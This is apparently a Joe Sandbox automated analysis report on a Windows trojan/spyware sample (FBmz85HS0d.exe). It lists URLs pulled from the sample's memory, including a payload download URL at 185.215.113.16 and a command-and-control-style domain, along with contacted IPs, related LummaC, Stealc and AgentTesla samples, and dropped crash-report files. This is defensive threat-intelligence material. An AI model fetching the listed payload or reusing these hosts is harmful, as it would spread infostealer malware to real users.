                                                                                                                                    http://crl.microFBmz85HS0d.exe, 00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446155060.0000000001254000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427541815.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1482458559.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446552557.0000000001254000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1378025809.0000000001224000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgFBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netFBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://cdn.cookielaw.org/FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uFBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9eFBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgFBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netFBmz85HS0d.exe, 00000000.00000003.1554179926.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://185.215.113.16/off/def.exeFBmz85HS0d.exe, 00000000.00000002.1875057545.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://bbuseruploads.s3.amazonaws.com/FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://cuddlyready.xyz/apingFBmz85HS0d.exe, 00000000.00000003.1427375694.0000000001287000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446443931.0000000001287000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctaFBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
Contacted IPs by country (map figure not reproduced; legend buckets: No. of IPs < 25%, 25% to 50%, 50% to 75%, > 75%)
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.150.173 | cuddlyready.xyz | United States | 13335 | CLOUDFLARENETUS | false
3.5.25.82 | s3-w.us-east-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
185.166.143.50 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579799
Start date and time: 2024-12-23 09:22:30 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: FBmz85HS0d.exe (renamed because the original name is a hash value)
Original Sample Name: 30669d81a7fc7b2867ecc452ce55d1d9.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@3/3
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.73.29, 13.107.246.63, 172.202.163.200, 40.126.53.7
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target FBmz85HS0d.exe, PID 7312, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtQueryDirectoryFile calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: FBmz85HS0d.exe
Time | Type | Description
03:23:29 | API Interceptor | 23x Sleep call for process: FBmz85HS0d.exe modified
05:13:04 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.150.173 | RDFchOT4i0.exe | malicious | Unknown | artemis-rat.com, artemis-rat.com:443
172.67.150.173 | 063837646WAYBILLMAR24.exe | malicious | RedLine | artemis-rat.com, artemis-rat.com:443
172.67.150.173 | SecuriteInfo.com.Trojan.DownLoaderNET.943.16578.26938.exe | malicious | Unknown | artemis-rat.com, artemis-rat.com:443
172.67.150.173 | DHL- Shipping invoice.exe | malicious | AgentTesla | artemis-rat.com, artemis-rat.com:443
172.67.150.173 | DHL EXPRESS.exe | malicious | AgentTesla | artemis-rat.com, artemis-rat.com:443
172.67.150.173 | Kazeem Engineering and Technical Services.exe | malicious | AgentTesla | heygirlisheeverythingyouwantedinaman.com, heygirlisheeverythingyouwantedinaman.com:443
172.67.150.173 | POs#U034fx#U034fl#U034fx#U034f..exe | malicious | AgentTesla | heygirlisheeverythingyouwantedinaman.com, heygirlisheeverythingyouwantedinaman.com:443
172.67.150.173 | PO-065-01-2024E-2.exe | malicious | AgentTesla | heygirlisheeverythingyouwantedinaman.com, heygirlisheeverythingyouwantedinaman.com:443
172.67.150.173 | New Orders#U034fx#U034fl#U034fx#U034f..exe | malicious | AgentTesla | artemis-rat.com, artemis-rat.com:443
172.67.150.173 | Payment Invoice.exe | malicious | AgentTesla | artemis-rat.com, artemis-rat.com:443
3.5.25.82 | Hilcorp.pdf | malicious | Unknown |
185.166.143.50 | Yh6fS6qfTE.exe | malicious | LummaC |
185.166.143.50 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
185.166.143.50 | V7giEUv6Ee.bat | malicious | Unknown |
185.166.143.50 | GdGXG0bnxH.exe | malicious | Unknown |
185.166.143.50 | fIPSLgT0lO.exe | malicious | Remcos |
185.166.143.50 | pPLwX9wSrD.exe | malicious | Remcos |
185.166.143.50 | ozfqy8Ms6t.exe | malicious | Unknown |
185.166.143.50 | 3XSXmrEOw7.exe | malicious | Unknown |
185.166.143.50 | pPLwX9wSrD.exe | malicious | Unknown |
185.166.143.50 | https://feji.us/m266he | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
cuddlyready.xyz | BJQizQ6sqT.exe | malicious | LummaC | 172.67.150.173
cuddlyready.xyz | FBVmDbz2nb.exe | malicious | LummaC, Stealc | 104.21.32.96
cuddlyready.xyz | QQ5BxgG5G6.exe | malicious | LummaC | 104.21.32.96
cuddlyready.xyz | FjFeChttqA.exe | malicious | LummaC | 172.67.150.173
cuddlyready.xyz | mG83m82qhF.exe | malicious | LummaC | 172.67.150.173
cuddlyready.xyz | w23Vg439U1.exe | malicious | LummaC, Stealc | 172.67.150.173
cuddlyready.xyz | pfY4k1qisn.exe | malicious | LummaC, Stealc |
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 104.21.32.96
                                                                                                                                                                                        0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 193.143.1.9
                                                                                                                                                                                        s3-w.us-east-1.amazonaws.comBJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 3.5.29.90
                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.216.152.124
                                                                                                                                                                                        mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.136.89
                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 16.182.101.249
                                                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.67.100
                                                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.18.140
                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.203.57
                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                        • 16.182.37.145
                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.216.41.233
                                                                                                                                                                                        bitbucket.orgBJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        CLOUDFLARENETUSarmv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 1.8.230.191
                                                                                                                                                                                        BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                        LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                        BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                        FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                        • 104.21.32.96
                                                                                                                                                                                        mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                        Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                        nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                        AMAZON-02USarmv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 108.159.159.70
                                                                                                                                                                                        BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.216.152.124
                                                                                                                                                                                        mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.67.100
                                                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.18.140
                                                                                                                                                                                        armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 54.203.164.5
                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.203.57
                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        AMAZON-AESUSdWGmbwk5xy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 3.5.29.90
                                                                                                                                                                                        qlo1CDVCSf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        6dPpCeWDig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        kFrGefsAK3.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        NT3kfq4eeE.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        DP3m5O6yk5.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        uuOuIXWp1W.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        4JpRlHS5uF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        ME3htMIepa.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        2ZsJ2iP8Q2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        LopCYSStr3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        VBHyEN96Pw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
BVGvbpplT8.exe: malicious (LummaC, Stealc)
• 172.67.150.173
• 3.5.25.82
• 185.166.143.50
613vKYuY2S.exe: malicious (LummaC)
• 172.67.150.173
• 3.5.25.82
• 185.166.143.50
FBVmDbz2nb.exe: malicious (LummaC, Stealc)
• 172.67.150.173
• 3.5.25.82
• 185.166.143.50
mgEXk8ip26.exe: malicious (LummaC)
• 172.67.150.173
• 3.5.25.82
• 185.166.143.50
44EPDJT1V8.exe: malicious (LummaC)
• 172.67.150.173
• 3.5.25.82
• 185.166.143.50
                                                                                                                                                                                        No context
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                        Entropy (8bit):1.046094359747674
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:+tFo+nUMgn7XasDohroI7JfGQXIDcQvc6QcEVcw3cE/9rKr++HbHg/8BRTf3Oy14:KC+8aT0BU/YjudxhYfzuiFGZ24IO8a
                                                                                                                                                                                        MD5:22E8D0B20ECAF7A2B11F4ADD6F3A0681
                                                                                                                                                                                        SHA1:9CB05149A3AA6B5FD696DC80831A9D8C9242493D
                                                                                                                                                                                        SHA-256:D90254519107BC4630CC7528826AA0D741A40EFE626137304C2A36B2F70227CB
                                                                                                                                                                                        SHA-512:78B7B353E13CFBC14F4EC18C9FDA2B53C26A811A5D0E065DCDF690232F8F656D2D89D437E4006E49F5935A6ECAC2436936DFBACB13599CB2C533E8E794BBE306
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.2.2.3.5.5.3.7.9.5.4.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.2.2.3.5.5.9.1.0.7.9.9.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.b.1.9.b.8.3.-.0.0.c.7.-.4.a.3.9.-.a.c.6.b.-.2.9.6.6.f.c.7.c.9.6.1.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.9.9.9.1.c.c.-.1.b.1.9.-.4.c.9.c.-.b.0.b.8.-.1.2.d.d.d.5.2.4.a.6.d.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.F.B.m.z.8.5.H.S.0.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.9.0.-.0.0.0.1.-.0.0.1.4.-.f.3.1.9.-.6.5.e.f.1.3.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.0.2.1.f.e.1.a.6.2.4.8.8.2.e.0.6.f.4.8.7.9.9.e.9.4.7.4.f.8.2.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.6.c.a.4.4.a.b.9.c.c.2.6.8.6.4.b.f.8.6.a.4.1.f.8.2.4.3.1.2.3.9.b.a.f.9.9.4.a.8.!.F.B.m.z.8.5.H.S.0.d...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 10:12:35 2024, 0x1205a4 type
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):288642
                                                                                                                                                                                        Entropy (8bit):1.482534872811401
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:A1zaxJ6+2ukUQizqUWQGg5yKqovSpqDL:emxJ6+fkU/zqUWrsyKqovSpq
                                                                                                                                                                                        MD5:1B61356973375AF9081C3960D9813CD4
                                                                                                                                                                                        SHA1:DA9296C1267FA57C6608DE5636959543874ACD93
                                                                                                                                                                                        SHA-256:F4ECF94C4C8508B2A313B7AF0E8A5D549F34EB0DCA01BB1497277CB69F85CCF8
                                                                                                                                                                                        SHA-512:104D10CA10E4FE23F8CBAA528AA9736AF37EAFF9795A28245A16BB1D231DDA532CEDDEC64EDBCD2F1A8E9DAC1CC89614B9FF8DF3451FEAA422C013392FB8676C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:MDMP..a..... ........7ig....................................D....'..........L...........`.......8...........T...........xL...............(...........*..............................................................................eJ......`+......GenuineIntel............T.............ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):8390
                                                                                                                                                                                        Entropy (8bit):3.7047405369732296
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:R6l7wVeJ/r676YN+SU90cgmfJMprD89bQWsfbaQm:R6lXJj676YESU90cgmfJVQ1fbM
                                                                                                                                                                                        MD5:A39FB5D30BAE5D543C5B227A6FFECCB9
                                                                                                                                                                                        SHA1:B0326C9BA385D1918D0A65682A982A04E54F99EC
                                                                                                                                                                                        SHA-256:641EBBE558333DA8D4C1B5371BEFDDE280BE95C765A671157E388912EC3797F4
                                                                                                                                                                                        SHA-512:389A4581882160AAEA1333096710FEED50E4CB423F2BAB185E3824E546AED4B1D05EFD3D6E7053146E56E877549B20F40F477E6F7B36FBAF8853D94ACB86E250
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.1.2.<./.P.i.
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):4624
                                                                                                                                                                                        Entropy (8bit):4.503258357857739
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsnUJg77aI930WpW8VY0Ym8M4JlKxFG+q8f6M5q2TzHXTd:uIjfnSI71t7VUJ7k42TzHXTd
                                                                                                                                                                                        MD5:6AE83BFFE6A48983AAEC7D032C328B9F
                                                                                                                                                                                        SHA1:BF2B413AC599747A90557155AC76B5CC098074CB
                                                                                                                                                                                        SHA-256:772BED64509D763C28C242029CF97CBCA8E53DD142BD650159106C2887BB4EC3
                                                                                                                                                                                        SHA-512:C5DCEAD0867C141F72D33853150536049E75E625C9020D5EB20B032667CAB0DF56EB17333CB7EDAFD9BC31CD217EBF764DFEB89CABD5523E0CA428D1B72E5AC2
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643755" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                        Entropy (8bit):4.416669207630832
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:6144:4cifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNl5+:ti58oSWIZBk2MM6AFBzo
                                                                                                                                                                                        MD5:0012748537F55D9387F5478EF49C2C94
